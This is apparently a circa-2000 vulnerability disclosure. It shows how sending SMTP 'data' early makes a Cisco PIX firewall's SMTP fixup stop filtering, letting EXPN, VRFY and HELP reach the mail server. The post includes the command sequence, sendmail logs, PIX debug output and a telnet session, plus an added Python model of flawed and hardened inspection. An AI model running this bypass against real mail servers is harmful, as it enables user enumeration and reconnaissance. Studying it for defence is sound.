How to escape the "fixup smtp" of the Cisco PIX Firewall:
Cisco Secure PIX Firewall Version 5.2(1)
Compiled on Tue 22-Aug-00 23:35 by bhochuli
pixtest1 up 22 days 5 hours
Hardware: SE440BX2, 128 MB RAM, CPU Pentium II 349 MHz
Flash i28F640J5 @ 0x300, 16MB
BIOS Flash AT29C257 @ 0xfffd8000, 32KB
0: ethernet0: address is 00d0.b790.41a5, irq 11
1: ethernet1: address is 00d0.b790.54d4, irq 10
2: ethernet2: address is 00e0.b601.d289, irq 15
3: ethernet3: address is 00e0.b601.d288, irq 9
4: ethernet4: address is 00e0.b601.d287, irq 11
5: ethernet5: address is 00e0.b601.d286, irq 10
When a new connection is established, the PIX uses its fixup filter to nullify every command
that is not in its "allowed list" (such as HELO, MAIL FROM:, RCPT TO:, DATA, RSET, QUIT).
For example, following the "security through obscurity" concept, it rewrites the banner of
the original MTA.
This is a sendmail...
220 ******************************************200000200
Now, the PIX nullifies the HELP command, and if I write an e-mail to my friend asking for ''help'', it would drop
the line on which I write "help".
So the Cisco PIX Firewall disables the fixup after the "data" command, until "<CR><LF><CR><LF>.<CR><LF>".
Now what happens if I don't complete the e-mail, or if I immediately type "data" in place of the normal
"helo, mail from, rcpt to, data, quit" sequence?
The PIX disables the fixup and gives me a direct channel to the MTA without doing any content filtering.
Here is an example of what I could do exploiting this bug:
helo ciao
mail from: [email protected]
data ( from here the PIX disables the fixup)
expn guest ( now I could enumerate users
vrfy oracle and have access to every command)
help
whatever command I want
quit
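As an added example (not code from the original post or from Cisco), here is a small Python model of the inspector state machine the post describes: the behaviour in the post (inspection switched off as soon as the client sends DATA) next to the hardened form that waits for the server's 354 reply before treating lines as message body. The allow-list, the function names and the replayed session are assumptions built from the exchange above.

```python
# Added illustration (not from the original post or from Cisco): a toy stateful
# SMTP inspector replaying the post's exchange; names and data are constructed.
ALLOWED = {"HELO", "EHLO", "MAIL", "RCPT", "DATA", "RSET", "QUIT"}  # assumed

def verb(line):
    return line.split(" ", 1)[0].upper()

def inspect(session, wait_for_354):
    """Client lines as forwarded to the MTA; disallowed commands become X's.
    session holds ("C", line) client lines and ("S", line) server replies.
    wait_for_354=False is the behaviour in the post: filtering stops as soon as
    the client says DATA.  wait_for_354=True (hardened) enters data mode only
    after the server accepts DATA with 354, so a 503 keeps filtering on."""
    in_data, pending, out = False, False, []
    for side, line in session:
        if side == "S":
            if pending:  # the reply to DATA decides the mode
                in_data, pending = line.startswith("354"), False
            continue
        if in_data:      # message body passes through until "."
            out.append(line)
            in_data = line != "."
        elif verb(line) == "DATA":
            out.append(line)
            pending, in_data = wait_for_354, not wait_for_354
        else:
            out.append(line if verb(line) in ALLOWED else "X" * len(line))
    return out

def leaked_commands(session, wait_for_354):
    """Disallowed verbs the MTA will execute: the MTA is in data mode only
    after it replied 354, so a line the inspector passed as 'body' may
    still be a command on the server side."""
    out, mta_in_data, leaked, i = inspect(session, wait_for_354), False, [], 0
    for side, line in session:
        if side == "S":
            mta_in_data = mta_in_data or line.startswith("354")
            continue
        fwd, i = out[i], i + 1
        if mta_in_data:
            mta_in_data = fwd != "."
        elif verb(fwd) not in ALLOWED and set(fwd) != {"X"}:
            leaked.append(verb(fwd))
    return leaked

SESSION = [  # constructed after the telnet session in the post
    ("C", "mail from: <[email protected]>"), ("S", "250 Sender ok"),
    ("C", "data"),       ("S", "503 Need RCPT (recipient)"),
    ("C", "help"),       ("S", "214 End of HELP info"),
    ("C", "expn pinco"), ("S", "550 pinco... User unknown"),
    ("C", "quit"),
]
```

With `wait_for_354=False` the HELP and EXPN lines after the rejected DATA reach the MTA untouched; with `wait_for_354=True` the 503 keeps the inspector in command mode and they are nullified, while a genuine message body accepted with 354 still passes through.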
Greetings to Cisco and its Security Products!
Here are the logs of my test...
=====
The sendmail log:
Sep 19 14:06:19 testbox sendmail[14163]: NOQUEUE: Authentication-Warning: testbox.test.it: [10.10.10.10] didn't use HELO
protocol
Sep 19 14:07:36 testbox sendmail[14164]: NOQUEUE: [10.10.10.10]: expn pinco
Sep 19 14:08:03 testbox sendmail[14165]: NOQUEUE: [10.10.10.10]: vrfy pallino
Sep 19 14:08:50 testbox sendmail[14163]: OAA14163: [email protected], size=0, class=0, pri=0, nrcpts=0,
proto=SMTP, relay=[10.10.10.10]
=====
Here is the output of "debug fixup tcp" on the PIX:
tcp: TCP MSS changed to 1380
smtp: command (172.16.1.2/25 <- 10.10.10.10/1302)
tcp: SYN out rcvd
tcp: TCP MSS changed to 1380
smtp_response: (172.16.1.2/25 -> 10.10.10.10/1302)
tcp: exiting embyonic
smtp: command (172.16.1.2/25 <- 10.10.10.10/1302)
tcp: TCP MSS changed to 1380
tcp: TCP MSS changed to 1380
tcp: TCP MSS changed to 1380
tcp: TCP MSS changed to 1380
tcp: TCP MSS changed to 1380
smtp_response: (172.16.1.2/25 -> 10.10.10.10/1302)
smtp: command (172.16.1.2/25 <- 10.10.10.10/1302)
smtp: command (172.16.1.2/25 <- 10.10.10.10/1302)
smtp: unknown command
smtp: X-ing ciao pix mi vuoi rispondere?
smtp_response: (172.16.1.2/25 -> 10.10.10.10/1302)
smtp_respond: ERR: bad reply code
smtp: command (172.16.1.2/25 <- 10.10.10.10/1302)
smtp: command (172.16.1.2/25 <- 10.10.10.10/1302)
smtp: help command
smtp: nullify <help> command
smtp_response: (172.16.1.2/25 -> 10.10.10.10/1302)
smtp_respond: ERR: bad reply code
smtp: command (172.16.1.2/25 <- 10.10.10.10/1302)
smtp: command (172.16.1.2/25 <- 10.10.10.10/1302)
smtp: mail command
smtp_response: (172.16.1.2/25 -> 10.10.10.10/1302)
smtp_response: (172.16.1.2/25 -> 10.10.10.10/1302)
smtp: command (172.16.1.2/25 <- 10.10.10.10/1302)
smtp: command (172.16.1.2/25 <- 10.10.10.10/1302)
smtp: data command
smtp: entering data mode
smtp_response: (172.16.1.2/25 -> 10.10.10.10/1302)
smtp_respond: ERR: bad reply code
smtp: command (172.16.1.2/25 <- 10.10.10.10/1302)
smtp: command (172.16.1.2/25 <- 10.10.10.10/1302)
smtp_response: (172.16.1.2/25 -> 10.10.10.10/1302)
smtp_respond: ERR: bad reply code
smtp: command (172.16.1.2/25 <- 10.10.10.10/1302)
smtp: command (172.16.1.2/25 <- 10.10.10.10/1302)
smtp_response: (172.16.1.2/25 -> 10.10.10.10/1302)
smtp_respond: ERR: bad reply code
smtp: command (172.16.1.2/25 <- 10.10.10.10/1302)
smtp: command (172.16.1.2/25 <- 10.10.10.10/1302)
smtp_response: (172.16.1.2/25 -> 10.10.10.10/1302)
smtp_respond: ERR: bad reply code
smtp: command (172.16.1.2/25 <- 10.10.10.10/1302)
Here is the telnet session:
naif:~# telnet 10.10.10.2 25
Trying 10.10.10.2...
Connected to 10.10.10.2.
Escape character is '^]'.
220 ******************************************200000200
ciao pix mi vuoi rispondere?
500 Command unrecognized: "XXXXXXXXXXXXXXXXXXXXXXXXXXXX"
help
500 Command unrecognized: "XXXX"
mail from: [email protected]
250 [email protected]... Sender ok
data
503 Need RCPT (recipient)
help
214-This is Sendmail version 8.9.1
214-Topics:
214- HELO EHLO MAIL RCPT DATA
214- RSET NOOP QUIT HELP VRFY
214- EXPN VERB ETRN DSN
214-For more info use "HELP <topic>".
214-To report bugs in the implementation send email to
214- [email protected].
214-For local information send email to Postmaster at your site.
214 End of HELP info
expn pinco
550 pinco... User unknown
vrfy pallino
550 pallino... User unknown
The End
Greetings to bolo for the PIX and the BSDI box :)
Kiss to my love NaiL^d0d :****
naif
e-mail:echo "[email protected]" | tr -d \ 'bdghlmoqrsuvwzy'
:pp